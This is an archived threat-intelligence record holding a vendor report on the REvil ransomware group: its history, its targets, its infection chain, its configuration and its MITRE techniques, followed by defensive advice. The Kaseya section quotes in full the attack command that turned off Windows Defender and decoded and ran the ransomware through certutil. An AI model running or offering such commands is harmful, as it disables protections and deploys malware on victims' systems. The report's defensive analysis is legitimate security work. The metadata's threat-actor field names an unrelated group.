{
	"id": "73883cdd-31a6-4fb5-aaba-67588fb7c55d",
	"created_at": "2026-04-06T00:13:18.550962Z",
	"updated_at": "2026-04-10T13:12:22.211282Z",
	"deleted_at": null,
	"sha1_hash": "0b632b881921692851c990158e54e5aec5a2c050",
	"title": "Ransomware Spotlight: REvil",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 335484,
	"plain_text": "Ransomware Spotlight: REvil\r\nArchived: 2026-04-05 14:09:02 UTC\r\nWater Mare: REvil behind the scenes\r\nThe connection between Water Mare and REvil dates back to April 2019, its first confirmed deployment. In June 2019, it was advertised by an actor with the username UNKN or Unknown (the same as REvil’s) on the XSS forum. It operated as an affiliate service: affiliates spread the ransomware to victims while REvil operators maintained the malware and payment infrastructure.\r\nIn 2020, Water Mare acquired new capabilities and accesses that would be used in future attacks, thanks to its affiliates. These capabilities include PE injection via PowerShell and the credential stealer KPOT, whose source code UNKN won in an auction. Affiliates also offered access to company networks and a VPN server. Around this time UNKN also made efforts to limit affiliates to Russian-speaking members to prevent infiltration.\r\n2021 was a series of highs and lows for Water Mare, culminating in the arrest of several affiliates and the closely documented downfall of REvil. The early part of the year promised new developments such as the aforementioned plans for distributed denial-of-service (DDoS) attacks, which would have ushered in triple extortion tactics. However, REvil’s biggest attacks — those that hit JBS and Kaseya — pushed law enforcement agencies to close in on the group. The FBI later attributed the Kaseya and JBS attacks to the Water Mare intrusion set. Law enforcement reportedly gained access to the Water Mare intrusion set’s servers and retrieved the master key for REvil, which was provided to Kaseya. Around the same time, distrust of the threat group began to take root, with an affiliate claiming to have been bypassed in the negotiation process through a backdoor, foreshadowing REvil’s unraveling.\r\nDespite announcing its return in September, by October 2021 Water Mare’s data leak program had become inaccessible and the affiliate program was terminated. Suspected Water Mare affiliates were also being arrested or tracked down, thanks to the efforts of global law enforcement agencies.\r\n
The future of REvil operators\r\nUltimately, REvil’s activities placed it at the top of the list of ransomware operators that governments were eager to crack down on. In a global effort, law enforcement went after REvil operators both offline and online, leading to the shutdown of its operations and actual arrests.\r\nBased on our findings from Water Mare, it is unlikely that the intrusion set will resurface under the name REvil because of the amount of negative publicity this moniker has received, given the following points:\r\nAffiliates doubted REvil's operations. The nature of REvil’s shutdown pointed to law enforcement involvement, and there were reports of a backdoor that cheated affiliates out of ransom negotiations. Ultimately, this cast considerable doubt on the group’s credibility among threat actors.\r\nREvil lacked leadership with the disappearance of UNKN. 0_neday, UNKN’s successor, was unable to inspire renewed confidence in REvil operations. In contrast to UNKN’s efforts to prevent infiltration, 0_neday made serious errors, such as failing to generate new private keys for the restored data leak site.\r\nREvil operated with reduced membership, which led to its shutdown. Efforts to attract affiliates again (such as changing the affiliate profit cut to 90%) backfired, as these efforts were likely interpreted by other threat actors as a final desperate measure.\r\nWe surmise that the group can persist by rebranding, which is a common tactic among ransomware operators and which has been done by the group before. Case in point, DarkSide has renamed itself BlackMatter. Meanwhile, REvil’s affiliates are likely to move to other ransomware operators, if they have not done so already. As for its operators, it is probable that they will continue to work or move to other ransomware operations, bringing their techniques with them. Therefore, for organizations wondering what’s next, there is still great value in understanding REvil tactics, techniques, and procedures (TTPs).\r\n
An overview of REvil operations\r\nOne aspect that made REvil’s operation infamous was its heavy extortion tactics. As mentioned earlier, operators behind the ransomware group considered DDoS and got in touch directly with customers, business partners, and the media to pressure victims into paying the ransom. They also auctioned stolen data to place more duress on their victims.\r\nREvil is also known as an example of highly targeted ransomware, as it utilized tools based on its operators’ high-level knowledge of their targeted entities. This resulted in a varied arsenal and customized infection chains, as we elaborate on later.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil\r\nPage 1 of 7\n\nTo this end, REvil used tools like FileZilla to exfiltrate data and PsExec to propagate and remotely execute the ransomware and other files. It also used other tools and malware such as PC Hunter, AdFind, BloodHound, NBTScan, SharpSploit, third-party file sync tools, and Qakbot, a trojan used to deliver ransomware.\r\n
Top affected industries and countries\r\nAs our detections show, REvil attacks were concentrated largely in the US, followed by Mexico and Germany by a wide margin. This is consistent with evidence found in the code of REvil that purposely excludes countries in the Commonwealth of Independent States (CIS) as its targets.\r\nFigure 1. Countries with the highest number of attack attempts for the REvil ransomware (January 1 to December 6, 2021)\r\nSource: Trend Micro™ Smart Protection Network™ infrastructure\r\nWe saw the most REvil-related detections in the transportation industry, followed by the financial sector. In our report summarizing ransomware activity in the first half of 2021, transportation was already among the top three most targeted sectors, likely for its role in the supply chain and logistics. In general, the top targeted sectors are all critical industries, further emphasizing how REvil had been operating, especially in 2021.\r\nFigure 2. Industries with the highest number of attack attempts for the REvil ransomware (January 1 to December 6, 2021)\r\nSource: Trend Micro Smart Protection Network infrastructure\r\n
Infection chains and techniques\r\nDue to its targeted nature, REvil used a variety of tools and malware depending on what the situation dictated. Its operators appeared to have a high level of knowledge of their victims’ environments, as evidenced by the level of customization in its attacks.\r\nInitial Access\r\nThe threat actors behind REvil hired a variety of affiliates for their initial access. Their methods ranged from malspam emails with spear-phishing links or attachments to RDP access and the use of valid accounts, compromised websites, and exploits. These tactics then led to the download and execution of the payload using normal binaries like CertUtil or PowerShell, or via macro. Threat actors could also take a more targeted approach by using RDP and PsExec to take control of the network and then deploy the payload. Another recently observed initial access vector is supply chain compromise, which could lead to the installation of Sodinstall or Sodinokibi, as observed in the Kaseya incident.\r\n
Download and Execution\r\nHere are some of the common ways the payload was downloaded and executed, based on what was observed and reported previously:\r\nCVE-2019-2725 led to the remote code execution (RCE) of CertUtil or PowerShell to download and execute REvil. There are also instances where REvil was loaded into the memory of PowerShell via reflective loading instead of executing a binary.\r\nMalspam led to a macro that is used to download and execute REvil, and malspam with an attachment (such as a PDF) might drop or download Qakbot in order to download additional components or payloads.\r\nDrive-by compromise directly led to REvil.\r\nCVE-2018-13379, CVE-2019-11510, and valid accounts led to RDP and PsExec, then to the dropping and execution of other components such as the antivirus-disabling tool, exfiltration tools, and finally, REvil.\r\nAnother execution method was through DLL sideloading. This method used a legitimate executable such as MsMpeng.exe to load the REvil DLL, which is named after a legitimate DLL like MpSvc.dll and is dropped by a custom installer detected as “SODINSTALL.”\r\nCVE-2021-30116, a zero-day vulnerability affecting Kaseya VSA servers, was also used in the Kaseya supply chain compromise. The payload was dropped to Kaseya's TempPath with the file name agent.exe. The VSA procedure used to deploy the encryptor was named \"Kaseya VSA Agent Hot-fix.” The \"Kaseya VSA Agent Hot-fix” procedure ran the following:\r\n\"C:\\WINDOWS\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 4979 \u003e nul \u0026\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring\r\n$true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true\r\n-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled\r\n-SubmitSamplesConsent NeverSend \u0026 copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe \u0026 echo\r\n%RANDOM% \u003e\u003e C:\\Windows\\cert.exe \u0026 C:\\Windows\\cert.exe -decode c:\\\\agent.crt c:\\\\agent.exe \u0026 del /q /f\r\nc:\\kworking\\agent.crt C:\\Windows\\cert.exe \u0026 c:\\\\agent.exe”\r\n
Lateral Movement\r\nThis happened in the more targeted attack flow, where the attackers made use of RDP and PsExec for lateral movement. This is also where the ransomware and its other components were dropped and executed.\r\nDiscovery\r\nREvil was also known for using network discovery tools such as AdFind, SharpSploit, BloodHound, and NBTScan. These tools were observed in recent REvil attacks.\r\nDefense Evasion\r\nPC Hunter and Process Hacker were observed to be present in the monitored campaigns and can be used to discover and terminate services and processes to disable antivirus products. These are among the legitimate tools commonly weaponized by modern ransomware.\r\nKillAV, meanwhile, is a custom malicious binary designed to uninstall antivirus-related products, either by querying the uninstall registry and uninstalling the associated program, or by terminating processes from its list.\r\nA new variant of REvil included a Safeboot routine in its arsenal, which is triggered when “-smode” is supplied as an argument. These new variants created various RunOnce registry entries in order to restart into Safe Mode and bypass security solutions that do not work under Safe Mode, before proceeding unhindered with the encryption routine.\r\nAside from execution, DLL sideloading could also be used to evade detection by running under the context of a legitimate file or process.\r\nIn the Kaseya supply chain compromise, PowerShell commands that were used to disable Windows Defender were also observed.\r\nCredential Access, Exfiltration\r\nSharpSploit was observed to be one of the tools recently used. This is an attack framework with credential access capabilities using a Mimikatz module.\r\nGathered information was then sent back to the actors via different observed methods, such as the installation of FileZilla to facilitate an FTP transfer, or the use of third-party sync tools like MegaSync, FreeFileSync and Rclone (64-bit).\r\n
Command and Control\r\nREvil would send a report and system info to its C\u0026C, which was done by generating a pseudorandom URL based on a fixed format and appending it to one of the domains listed in its configuration. The URLs followed this format:\r\nhttps://{Domain}/{String 1}/{String 2}/{random characters}.{String 3}\r\nThe domain and the strings here meant the following:\r\nDomain: from a list based on the configuration\r\nString 1: wp-content, include, content, uploads, static, admin, data, or news\r\nString 2: images, pictures, image, temp, tmp, graphic, assets, or pics\r\nString 3: jpg, png, gif\r\n
Impact\r\nThe impact and encryption process itself did not change much since its inception.\r\nIt tried to escalate its privilege via an exploit (the code is in the binary) or token impersonation, and it created a mutex.\r\nIt decrypted its JSON config from one of its sections to learn how it would proceed with its routines. This configuration was an encrypted JSON file located in a section of the decrypted binary, and it was decrypted using RC4. The JSON file contained the following configuration:\r\npk → base64 public encryption key of attacker\r\npid → personal id of the actor\r\nsub → campaign id\r\ndbg → debug mode\r\nfast → fast mode\r\nwipe → enable wipe of specific directories\r\nwht → whitelist dictionary\r\nfld → whitelisted folders\r\nfls → whitelisted filenames\r\next → whitelisted file extensions\r\nwfld → directories to wipe\r\nprc → processes to kill before the encryption\r\ndmn → domains to contact after encryption\r\nnet → send HTTP POST request to domains\r\nnbody → base64 encoded ransom note body\r\nnname → ransom note file name\r\nexp → run exploit if true\r\nimg → base64 encoded message on desktop background\r\nsvc → terminated services\r\nExamples of these routines included processes to terminate, C\u0026C to report to, and the extension to use, among others.\r\nIt would then check the keyboard layout or the language of the affected system and avoid a certain list of countries.\r\nAfterward, it would create registry entries for keys, file extensions, and the stats after encryption.\r\nThe payload would then proceed with its encryption routine, which would be based on the configuration for files to encrypt, keys to use, processes or directories to terminate or delete, ransom note information, C\u0026C domains, and others.\r\nLastly, it would proceed with deleting backups like shadow copies and report to its C\u0026C the status of the infection.\r\n
MITRE tactics and techniques\r\nInitial Access:\r\nT1566 - Phishing: Arrives via phishing emails, sometimes with Qakbot or IcedID\r\nT1190 - Exploit public-facing application: Arrives via any of the following exploits: CVE-2018-13379, CVE-2019-2725, CVE-2019-11510, CVE-2021-30116\r\nT1189 - Drive-by compromise: Makes use of compromised websites like forums to download REvil when accessed\r\nT1195 - Supply chain compromise: Compromised Kaseya VSA servers were used to push out REvil to victims\r\nT1078 - Valid accounts: Has been reported to make use of compromised accounts to access victims via RDP or RMMs\r\nExecution:\r\nT1106 - Execution through API: Uses native API to execute various commands/routines\r\nT1059 - Command and scripting interpreter: Uses various scripting interpreters like PowerShell, Windows command shell and Visual Basic (macro in documents)\r\nT1129 - Shared modules: Made use of DLL sideloading to execute REvil DLLs\r\nT1204 - User execution: User execution is needed to carry out the payload from the spear-phishing link/attachments\r\nPersistence:\r\nT1547 - Boot or logon autostart execution: Creates registry run entries for restarting in safe mode\r\nT1574 - Hijack execution flow: Hijacks the normal execution of MsMpeng.exe and MpSvc.dll via the DLL-sideloading technique\r\nPrivilege Escalation:\r\nT1134 - Access token manipulation: Uses the ImpersonateLoggedOnUser API to impersonate the security context of the user who is logged in\r\nT1068 - Exploitation for privilege escalation: Makes use of CVE-2018-8453 to escalate privilege\r\nT1574 - Hijack execution flow: Depending on the privilege context of the normal executable file being abused, might also be used for privilege escalation\r\nDefense Evasion:\r\nT1027 - Obfuscated files or information: Some variants (or their config) are obfuscated to make detection more difficult. Some variants have a custom packer to make analysis or detection more difficult\r\nT1562 - Impair defenses: Disables security-related software by running in safe mode or terminating it\r\nT1574 - Hijack execution flow: DLL sideloading can also be used as a form of defense evasion\r\nDiscovery:\r\nT1083 - File and directory discovery: Searches for specific files and directories related to its encryption\r\nT1018 - Remote system discovery: Makes use of tools for network scans\r\nT1057 - Process discovery: Discovers certain processes for process termination\r\nT1082 - System information discovery: Identifies keyboard layout and other system information\r\nT1012 - Query registry: Queries certain registry keys as part of its routine\r\nT1063 - Security software discovery: Discovers security software for reconnaissance and termination\r\nCredential Access:\r\nT1003 - OS credential dumping: Might utilize tools like SharpSploit, which contains a Mimikatz module\r\nT1552 - Unsecured credentials: Might utilize tools like SharpSploit, which contains a Mimikatz module\r\nLateral Movement:\r\nT1570 - Lateral tool transfer: Can make use of RDP or SMB admin shares via PsExec to transfer the ransomware or tools within the network\r\n
Summary of malware, tools, and exploits used\r\nSecurity teams can watch out for the presence of the following malware, tools, and exploits that are typically used in REvil attacks:\r\nInitial Entry: Phishing emails; Exploits: CVE-2018-13379, CVE-2019-2725, CVE-2019-11510, CVE-2021-30116\r\nExecution: Sodinstall (DLL sideloading), Qakbot, IcedID\r\nDiscovery: Netscan.exe, NBTScan, AdFind, BloodHound, SharpSploit\r\nPrivilege Escalation: KillAV, CVE-2018-8453, Sodinstall (DLL sideloading)\r\nCredential Access: SharpSploit\r\nLateral Movement: RDP, PsExec\r\nDefense Evasion: KillAV, Process Hacker, PC Hunter, Sodinstall (DLL sideloading)\r\n
Recommendations\r\nWhile REvil operations have been shut down, it is likely that organizations, government bodies, and perhaps even ordinary consumers will not easily forget the consequences of its attacks. Affiliates that have been involved in the attacks could move to other ransomware operators, while REvil TTPs can be mimicked in newer campaigns. In the meantime, the current shutdown is a good opportunity to learn from REvil as the group lies low.\r\nTo help defend systems against similar threats, organizations can establish security frameworks that allocate resources systematically for establishing a solid defense against ransomware.\r\nHere are some best practices that can be included in these frameworks:\r\nAudit and inventory\r\nTake an inventory of assets and data.\r\nIdentify authorized and unauthorized devices and software.\r\nMake an audit of event and incident logs.\r\nConfigure and monitor\r\nManage hardware and software configurations.\r\nGrant admin privileges and access only when necessary to an employee’s role.\r\nMonitor network ports, protocols, and services.\r\nActivate security configurations on network infrastructure devices such as firewalls and routers.\r\nEstablish a software allow list that only executes legitimate applications.\r\nPatch and update\r\nConduct regular vulnerability assessments.\r\nPerform patching or virtual patching for operating systems and applications.\r\nUpdate software and applications to their latest versions.\r\nProtect and recover\r\nImplement data protection, backup, and recovery measures.\r\nEnable multifactor authentication (MFA).\r\nSecure and defend\r\nEmploy sandbox analysis to block malicious emails.\r\nDeploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network.\r\nDetect early signs of an attack such as the presence of suspicious tools in the system.\r\nUse advanced detection technologies such as those powered by AI and machine learning.\r\nTrain and test\r\nRegularly train and assess employees on security skills.\r\nConduct red-team exercises and penetration tests.\r\n
A multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior can help protect enterprises.\r\nTrend Micro Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on before the ransomware can do irreversible damage to the system.\r\nTrend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.\r\nTrend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.\r\nTrend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.\r\nIndicators of Compromise\r\nThe IOCs for this article can be found here. Actual indicators might vary per attack.\r\nSource: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil"
	],
	"report_names": [
		"ransomware-spotlight-revil"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434398,
	"ts_updated_at": 1775826742,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0b632b881921692851c990158e54e5aec5a2c050.pdf",
		"text": "https://archive.orkl.eu/0b632b881921692851c990158e54e5aec5a2c050.txt",
		"img": "https://archive.orkl.eu/0b632b881921692851c990158e54e5aec5a2c050.jpg"
	}
}